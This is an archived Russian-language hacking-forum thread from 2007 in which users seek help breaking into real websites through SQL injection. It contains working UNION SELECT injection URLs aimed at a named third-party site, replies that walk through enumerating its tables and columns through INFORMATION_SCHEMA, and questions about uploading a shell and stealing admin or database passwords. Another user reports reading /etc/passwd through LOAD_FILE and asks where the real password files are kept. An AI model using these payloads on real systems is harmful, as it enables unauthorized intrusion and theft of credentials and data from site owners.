10.11.2007, 04:16
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
http://sc-ufa.uraltb.ru/?id=4+UNION+SELECT+1,2,3+LIMIT+1,1/*
можно ли сюда шелл залить или пароль получить от админки? или от БД
|
|
|
10.11.2007, 04:33
|
|
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
С нами:
10488959
Репутация:
474
|
|
Шелл не зальешь. Файл прив выключен, есть экранирование кавычек.
Прав на чтение mysql.user нет
Версия мускула 5, можно узнать имена таблиц и столбцов
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
вот например таблица _a3access
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,table_name,3+from+INFORMATION_SCHEMA.tables+limit+16,1/*
Для просмотра меняшь limit.
вот пример просмотра столбцов в этой же таблице
Код:
http://sc-ufa.uraltb.ru/?id=4+and+1=0+UNION+SELECT+1,column_name,3+from+INFORMATION_SCHEMA.columns+where+table_name=0x5F6133616363657373+limit+0,1/*
Для просмотра других столбцов также меняешь лимит |
|
|
|
10.11.2007, 05:42
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
ещё вопрос, как изменять данные которые находяться в столбцах
|
|
|
|
10.11.2007, 12:08
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от SVAROG
ещё вопрос, как изменять данные которые находяться в столбцах
При помощи MySql инъекции в конструкции select никак, потому что нет возможности использовать разделитель ";"
__________________
Карфаген должен быть разрушен...
|
|
|
|
10.11.2007, 17:14
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
С нами:
9739767
Репутация:
3
|
|
Подскажите: на сайте сделал так: https://www.server.ru/dir/index.php?do=viewinforum&cid=0&p=-1
На странице выпала стесно оштбочка следующего содержания:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/dist/html/include/gen/forum.php on line 110
Вопрос: это и есть SQL-injection? Если да, то какие действия далее?(+union+select+nul-- ничего не дает, даже это: +union+select+@@version+)
Последний раз редактировалось Derec; 10.11.2007 в 17:16..
|
|
|
|
10.11.2007, 18:12
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
В двух словах не рассказать. Ищи основы проведения инъекций.
Либо можешь просмотреть сразу примеры:
http://forum.antichat.ru/thread21336.html
|
|
|
|
10.11.2007, 18:32
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
Для начала, неплохо бы обратиться к статьям, их ведь не от нечего делать писали.
http://forum.antichat.ru/thread43966.html
|
|
|
|
13.11.2007, 02:24
|
|
Новичок
Регистрация: 12.11.2007
Сообщений: 25
С нами:
9734371
Репутация:
3
|
|
где лежат пароли?
Здравствуйте! 
По SQL injection FAQ и ещё одному FAQ вытащил файл '/etc/passwd' через LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119 ,100)), а в нем НЕТ НИ ОДНОГО пароля!
Имеет вид:
Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/bin/bash vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin SSH:/var/empty/sshd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin trasfert:x:500:500::/home/trasfert:/bin/bash ftpdumprm:x:501:501::/home/ftpdumprm:/bin/bash
Пароль root есть в MySQL хеше, подбирается, но вероятность не велика ))
Подскажите, с этими данными что-нибудь можно сделать? Где нормальный файл с паролями может лежать?
Спасибо! |
|
|
|
12.11.2007, 01:00
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
С нами:
9739767
Репутация:
3
|
|
Ну тогда хотя бы скажите это Sql инъекция или липа?
|
|
|
|
12.11.2007, 01:09
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
Ну надо полагать что да... Хотя ссылку бы кинул, глянул может...
__________________
Кто я?..
Последний раз редактировалось I-I()/Ib; 12.11.2007 в 01:12..
Причина: запятые это вещь...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
